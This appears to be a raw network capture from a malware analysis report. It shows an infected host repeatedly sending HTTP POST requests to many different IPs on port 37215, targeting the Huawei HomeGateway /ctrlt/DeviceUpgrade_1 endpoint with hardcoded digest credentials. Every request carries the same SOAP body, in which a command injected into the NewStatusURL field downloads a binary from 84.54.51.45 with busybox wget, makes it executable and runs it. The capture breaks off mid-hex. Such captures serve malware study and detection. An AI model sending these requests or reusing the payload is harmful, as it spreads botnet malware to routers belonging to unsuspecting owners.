                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            532192.168.2.154937241.32.22.7937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787899971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            533192.168.2.154343441.134.138.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787925959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            534192.168.2.154078041.149.165.5437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787967920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            535192.168.2.154135841.107.248.8437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.787983894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            536192.168.2.154022841.111.245.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.099384069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            537192.168.2.154013041.185.23.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.099469900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            538192.168.2.154609641.157.145.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.099473953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            539192.168.2.156089841.114.29.6237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.099473953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            540192.168.2.153313241.45.188.23737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.099488020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            541192.168.2.154252641.74.73.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.099488020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 